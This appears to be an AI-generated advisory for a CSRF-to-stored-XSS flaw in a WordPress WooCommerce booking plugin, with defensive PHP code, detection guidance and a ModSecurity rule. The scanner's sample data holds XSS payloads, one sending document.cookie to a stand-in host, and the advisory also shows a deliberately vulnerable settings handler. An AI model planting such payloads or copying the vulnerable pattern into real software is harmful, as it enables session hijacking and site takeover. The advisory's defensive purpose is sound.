CVE-2025-58991 Overview
CVE-2025-58991 is a Cross-Site Request Forgery (CSRF) vulnerability [CWE-352] in the Cristiano Zanca WooCommerce Booking Bundle Hours WordPress plugin. The flaw affects all versions up to and including 0.7.4. Successful exploitation chains CSRF with Stored Cross-Site Scripting (XSS), allowing attackers to persist malicious JavaScript inside the WordPress admin context.
An unauthenticated attacker can trick an authenticated administrator into submitting a forged request. The request writes attacker-controlled script content into plugin-managed data, which later executes in any visitor or administrator session that renders the affected page.
Critical Impact
A single click by an authenticated WordPress administrator on an attacker-controlled link can plant persistent JavaScript that runs against every subsequent visitor of the affected page.
Affected Products
- Cristiano Zanca WooCommerce Booking Bundle Hours plugin for WordPress
- All versions through 0.7.4 (the advisory records no lower bound, so treat every installed release as affected)
- WordPress sites running WooCommerce with this plugin installed
Discovery Timeline
- 2025-09-09 - CVE-2025-58991 published to NVD
- 2026-04-28 - Last updated in NVD database
Technical Details for CVE-2025-58991
Vulnerability Analysis
The vulnerability stems from missing anti-CSRF protections on state-changing endpoints in the WooCommerce Booking Bundle Hours plugin. Administrative actions that update plugin settings or stored data do not validate a WordPress nonce or verify request origin. An attacker can craft an HTML form or fetch request that targets these endpoints.
When an authenticated administrator visits an attacker-controlled page, the browser automatically attaches WordPress session cookies. The forged request executes with full administrator privileges. Because the affected fields are not sanitized against script content, the attacker can inject persistent JavaScript payloads, producing a Stored XSS condition.
The stored payload executes whenever the affected admin or front-end page is rendered. In an administrator's browser it can ride that session to create accounts, install plugins or themes, or rewrite settings, which is a path to full site takeover. WordPress authentication cookies are HttpOnly, so the realistic payload acts through the admin's browser (for example by calling wp-admin or REST endpoints with the nonce already present on the page) rather than by exfiltrating cookies. Only one user action is required: a click on an attacker-controlled URL while logged in.
Root Cause
The plugin omits nonce verification on its settings handlers: neither wp_verify_nonce() nor check_admin_referer() (or check_ajax_referer() for AJAX actions) is called before state is written. It also fails to sanitize the stored input with wp_kses(), sanitize_text_field() or a comparable filter, and the values are rendered without escaping. The absence of both controls converts a CSRF flaw into a persistent XSS primitive: the nonce gap lets the request through, the sanitization gap lets the script survive.
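The two missing controls side by side, as an added example that is not the plugin's own code: a hypothetical admin-post.php handler with neither control, followed by a hardened version and the form that feeds it. The action slug bbh_save_settings, the option name bbh_settings, the field bundle_label and the manage_woocommerce capability are assumptions chosen for illustration.

```php
<?php
// Added example, not the plugin's code. The bbh_* names, the bbh_settings option,
// the bundle_label field and the manage_woocommerce capability are assumptions.

// VULNERABLE PATTERN (deliberately not registered here): no nonce, no capability
// check, raw input stored. A forged cross-site POST from a logged-in admin's
// browser reaches this with the admin's cookies, and a <script> in bundle_label
// is persisted verbatim, i.e. CSRF promoted to stored XSS.
function bbh_save_settings_vulnerable() {
    $settings = get_option( 'bbh_settings', array() );
    $settings['bundle_label'] = $_POST['bundle_label'];
    update_option( 'bbh_settings', $settings );
    wp_safe_redirect( admin_url( 'admin.php?page=bbh-settings' ) );
    exit;
}

// HARDENED: nonce bound to this action (stops CSRF), capability check,
// sanitization on input (stops the stored payload), escaping on output.
function bbh_save_settings_hardened() {
    // Dies with a 403 page unless $_REQUEST['_wpnonce'] was minted for the
    // action 'bbh_save_settings' in the current user's session.
    check_admin_referer( 'bbh_save_settings' );

    if ( ! current_user_can( 'manage_woocommerce' ) ) {
        wp_die( esc_html__( 'Insufficient permissions.', 'bbh' ), 403 );
    }

    $settings = get_option( 'bbh_settings', array() );
    // Plain-text field: strip tags entirely. A field that legitimately holds
    // markup would go through wp_kses_post() or wp_kses() with an allow-list.
    $settings['bundle_label'] = sanitize_text_field( wp_unslash( $_POST['bundle_label'] ?? '' ) );
    update_option( 'bbh_settings', $settings );

    wp_safe_redirect( admin_url( 'admin.php?page=bbh-settings' ) );
    exit;
}
add_action( 'admin_post_bbh_save_settings', 'bbh_save_settings_hardened' );

// The settings form must carry the matching nonce, and the stored value is
// escaped again on output so a bad value can never reach the DOM unescaped.
function bbh_render_settings_form() {
    $settings = get_option( 'bbh_settings', array() );
    ?>
    <form method="post" action="<?php echo esc_url( admin_url( 'admin-post.php' ) ); ?>">
        <?php wp_nonce_field( 'bbh_save_settings' ); ?>
        <input type="hidden" name="action" value="bbh_save_settings">
        <input type="text" name="bundle_label"
               value="<?php echo esc_attr( $settings['bundle_label'] ?? '' ); ?>">
        <?php submit_button(); ?>
    </form>
    <?php
}
```

A forged form hosted elsewhere cannot supply a valid _wpnonce for the victim's session, so check_admin_referer() stops the request before any write; sanitize_text_field() and esc_attr() are the second layer that keeps a stored value from ever executing, which matters if a nonce check is later bypassed by some other bug.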
Attack Vector
The attack is network-based and requires user interaction. An attacker hosts a malicious page containing an auto-submitting form pointing at the vulnerable plugin endpoint. After luring an authenticated administrator to the page, the browser issues the forged POST request. The payload is stored server-side and executes in the context of the WordPress site, crossing privilege boundaries (scope change).
No verified public exploit code is available. Technical details are documented in the Patchstack Vulnerability Report.
Detection Methods for CVE-2025-58991
Indicators of Compromise
- Unexpected <script>, onerror, or onload content inside plugin-managed booking configuration fields stored in the wp_options or plugin-specific tables.
- Administrator POST requests to plugin endpoints whose Origin or Referer host is not the site's own (or that carry Sec-Fetch-Site: cross-site), or that arrive without a nonce parameter. The nonce normally travels in the POST body, so this indicator is only visible where request bodies are logged (WAF or application audit log), not in a standard access log.
- New or modified administrator accounts, plugins, or themes appearing shortly after an admin session.
- Outbound requests from visitor browsers to unfamiliar domains after loading pages that render booking content.
Detection Strategies
- Audit WordPress database tables for HTML or JavaScript content in fields managed by the WooCommerce Booking Bundle Hours plugin. Plugin settings are typically stored as PHP-serialized arrays in wp_options, so decode each value before pattern matching rather than grepping the raw column.
- Inspect request logs for POST requests to plugin admin handlers (admin-post.php, admin-ajax.php, options.php) with missing or malformed nonce parameters. Standard access logs do not record POST bodies; enable body logging at the WAF or reverse proxy, or log the nonce check result in the application, before relying on this signal.
- Correlate administrator login events with subsequent configuration changes to identify session-riding patterns.
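The database audit described above, as an added example that is not part of the advisory: a stand-alone PHP script that takes wp_options-style rows (option_name => option_value), decodes PHP-serialized values without instantiating objects, walks nested arrays and reports any string that looks like executable content. The option names and row contents below are constructed sample data, and the bbh_ prefix is an assumption.

```php
<?php
// Added example, not part of the advisory or the plugin. Scans wp_options-style
// rows for script-bearing content. The sample rows at the bottom are constructed.

// Patterns that should never appear in a value meant to hold plain text.
// Review hits manually: the on*= pattern can also match innocent prose.
const BBH_XSS_PATTERNS = array(
    '/<\s*script\b/i',
    '/\bon[a-z]+\s*=/i',                       // onerror=, onload=, onmouseover= ...
    '/javascript\s*:/i',
    '/<\s*(iframe|svg|object|embed)\b/i',
);

// WordPress stores arrays PHP-serialized. Decode with object instantiation
// disabled so a crafted value cannot trigger __wakeup/__destruct gadgets.
function bbh_unserialize_safe( $value ) {
    if ( is_string( $value ) && preg_match( '/^(a|O|s|i|b|d|N)[:;]/', $value ) ) {
        $decoded = @unserialize( $value, array( 'allowed_classes' => false ) );
        if ( false !== $decoded || 'b:0;' === $value ) {
            return $decoded;
        }
    }
    return $value;
}

// Recursively walk a decoded value and collect suspicious strings with the
// path (option/key/subkey) where each was found.
function bbh_find_script_content( $value, string $path = '' ): array {
    $hits  = array();
    $value = bbh_unserialize_safe( $value );
    if ( is_array( $value ) || is_object( $value ) ) {
        foreach ( (array) $value as $key => $child ) {
            $hits = array_merge( $hits, bbh_find_script_content( $child, $path . '/' . $key ) );
        }
        return $hits;
    }
    if ( is_string( $value ) ) {
        foreach ( BBH_XSS_PATTERNS as $pattern ) {
            if ( preg_match( $pattern, $value ) ) {
                $hits[] = array( 'path' => $path, 'pattern' => $pattern, 'value' => $value );
                break;
            }
        }
    }
    return $hits;
}

function bbh_scan_options( array $rows ): array {
    $findings = array();
    foreach ( $rows as $name => $raw ) {
        foreach ( bbh_find_script_content( $raw, $name ) as $hit ) {
            $findings[] = $hit;
        }
    }
    return $findings;
}

// Constructed sample rows, shaped like the result of
//   SELECT option_name, option_value FROM wp_options WHERE option_name LIKE 'bbh_%';
$sample_rows = array(
    'bbh_settings'    => serialize( array( 'bundle_label' => 'Weekend package', 'hours' => 4 ) ),
    'bbh_display'     => serialize( array( 'notice' => array(
        'text' => '<img src=x onerror=fetch("https://example.invalid/c?"+document.cookie)>',
    ) ) ),
    'bbh_footer_text' => '<script src="https://example.invalid/x.js"></script>',
    'bbh_legacy_flag' => 'yes',
);

foreach ( bbh_scan_options( $sample_rows ) as $f ) {
    printf( "SUSPECT %s matched %s: %s\n", $f['path'], $f['pattern'], substr( $f['value'], 0, 80 ) );
}
```

Run it with php on the exported rows (for example from wp db query or a mysqldump of wp_options) to get two findings for the sample data, bbh_display/notice/text and bbh_footer_text, and nothing for the clean rows. The same walker can be pointed at plugin-specific tables once their column names are known.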
Monitoring Recommendations
- Enable WordPress audit logging to capture plugin setting changes, user creation, and file modifications.
- Deploy a Web Application Firewall (WAF) ruleset that flags cross-origin POST submissions to /wp-admin/ endpoints, keyed on Sec-Fetch-Site: cross-site or on an Origin/Referer host that does not match the site's own host.
- Monitor for Content Security Policy (CSP) violation reports indicating inline script execution on booking pages.
How to Mitigate CVE-2025-58991
Immediate Actions Required
- Deactivate the WooCommerce Booking Bundle Hours plugin until a patched release is verified by the vendor.
- Review plugin configuration entries and remove any unexpected HTML or JavaScript content from stored values.
- Force a password reset and session invalidation for all WordPress administrator accounts.
- Audit recently created users, installed plugins, and modified theme files for unauthorized changes.
Patch Information
No fixed version is listed in the available advisory data. Versions through 0.7.4 remain vulnerable. Monitor the Patchstack advisory and the WordPress plugin repository for an updated release.
Workarounds
- Restrict access to /wp-admin/ by IP allowlist at the web server or WAF layer. This does not stop CSRF by itself, because the forged request is issued by the administrator's own browser from an allowlisted address; it reduces exposure by keeping every other client away from the admin endpoints and from any payload stored on admin-only pages.
- Enforce a strict Content Security Policy that disallows inline scripts on front-end booking pages. wp-admin itself depends on inline scripts, so roll the policy out in report-only mode first and expect to scope it to the front end.
- Require administrators to use a dedicated browser profile with no cross-site browsing during privileged sessions.
- Apply virtual patching rules in a WAF to block requests to plugin endpoints missing a valid _wpnonce parameter.
# Example WAF rule (ModSecurity v2) to block CSRF on plugin endpoints.
# Denies POSTs to admin-post.php that carry no _wpnonce argument at all. The
# field name _wpnonce is an assumption; a handler that names its nonce field
# differently would be blocked too, so check the plugin's form before deploying.
SecRule REQUEST_METHOD "@streq POST" \
    "id:1058991,phase:2,deny,status:403,log,msg:'CVE-2025-58991 CSRF block',chain"
    SecRule REQUEST_URI "@contains /wp-admin/admin-post.php" "chain"
    SecRule &ARGS:_wpnonce "@eq 0"
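An application-level counterpart to the WAF rule, as an added example that is not part of the advisory or the plugin: a must-use plugin that rejects state-changing requests to wp-admin which the browser itself marks as cross-site (Sec-Fetch-Site, falling back to Origin and Referer). It protects every admin_post and admin-ajax handler at once, without knowing the vulnerable plugin's endpoint or nonce field name. The file name csag.php, the csag_ prefix and the sample requests in the CLI check are assumptions.

```php
<?php
/**
 * Plugin Name: Cross-site admin write guard
 * Description: Added example for mitigating CSRF against wp-admin; not the
 *              advisory's or the plugin's code. Install as wp-content/mu-plugins/csag.php.
 */

/**
 * True if the request is a state-changing method that the browser marked as
 * coming from another site. Pure function so it can be run without WordPress.
 *
 * @param array  $server    Copy of $_SERVER.
 * @param string $site_host Host component of the WordPress site URL.
 */
function csag_is_cross_site_write( array $server, string $site_host ): bool {
    $method = strtoupper( $server['REQUEST_METHOD'] ?? 'GET' );
    if ( ! in_array( $method, array( 'POST', 'PUT', 'PATCH', 'DELETE' ), true ) ) {
        return false; // Reads carry no state change to forge.
    }

    // Fetch Metadata: current browsers send this header on every request.
    $fetch_site = strtolower( $server['HTTP_SEC_FETCH_SITE'] ?? '' );
    if ( 'cross-site' === $fetch_site ) {
        return true;
    }
    // 'same-site' trusts sibling subdomains; drop it if untrusted content lives there.
    if ( in_array( $fetch_site, array( 'same-origin', 'same-site', 'none' ), true ) ) {
        return false;
    }

    // Older browsers: fall back to Origin, then Referer. A literal "null" Origin
    // (sandboxed frame or cross-origin redirect) is treated as hostile.
    foreach ( array( 'HTTP_ORIGIN', 'HTTP_REFERER' ) as $header ) {
        if ( ! empty( $server[ $header ] ) ) {
            if ( 'null' === $server[ $header ] ) {
                return true;
            }
            $host = (string) parse_url( $server[ $header ], PHP_URL_HOST );
            return 0 !== strcasecmp( $host, $site_host );
        }
    }

    // No browser headers at all: wp-cli, curl, cron. Browsers always send an
    // Origin on cross-site POSTs, so allowing this does not reopen CSRF.
    return false;
}

if ( function_exists( 'add_action' ) ) {
    // Priority 0 runs before any plugin's own admin_init or admin_post_* handlers.
    add_action( 'admin_init', function () {
        $site_host = (string) parse_url( site_url(), PHP_URL_HOST );
        if ( csag_is_cross_site_write( $_SERVER, $site_host ) ) {
            wp_die( 'Cross-site request to wp-admin rejected.', 'Forbidden', array( 'response' => 403 ) );
        }
    }, 0 );
} else {
    // Constructed requests for a stand-alone check: php csag.php
    $cases = array(
        'forged POST, modern browser' => array( array( 'REQUEST_METHOD' => 'POST', 'HTTP_SEC_FETCH_SITE' => 'cross-site', 'HTTP_ORIGIN' => 'https://evil.example' ), true ),
        'legit form submit'           => array( array( 'REQUEST_METHOD' => 'POST', 'HTTP_SEC_FETCH_SITE' => 'same-origin', 'HTTP_ORIGIN' => 'https://shop.example' ), false ),
        'forged POST, old browser'    => array( array( 'REQUEST_METHOD' => 'POST', 'HTTP_REFERER' => 'https://evil.example/lure.html' ), true ),
        'wp-cli style request'        => array( array( 'REQUEST_METHOD' => 'POST' ), false ),
        'plain admin page GET'        => array( array( 'REQUEST_METHOD' => 'GET', 'HTTP_SEC_FETCH_SITE' => 'cross-site' ), false ),
    );
    foreach ( $cases as $label => list( $server, $expected ) ) {
        $got = csag_is_cross_site_write( $server, 'shop.example' );
        printf( "%-28s blocked=%s %s\n", $label, var_export( $got, true ), $got === $expected ? 'OK' : 'MISMATCH' );
    }
}
```

Running the file outside WordPress exercises the decision function against the constructed requests; inside WordPress it hooks admin_init, which fires for wp-admin pages, admin-post.php and admin-ajax.php. Legitimate cross-site callers of admin-ajax.php (a headless front end on another domain, for instance) would be blocked as well, so add an allow-list for their Origin before deploying where such integrations exist.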
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.


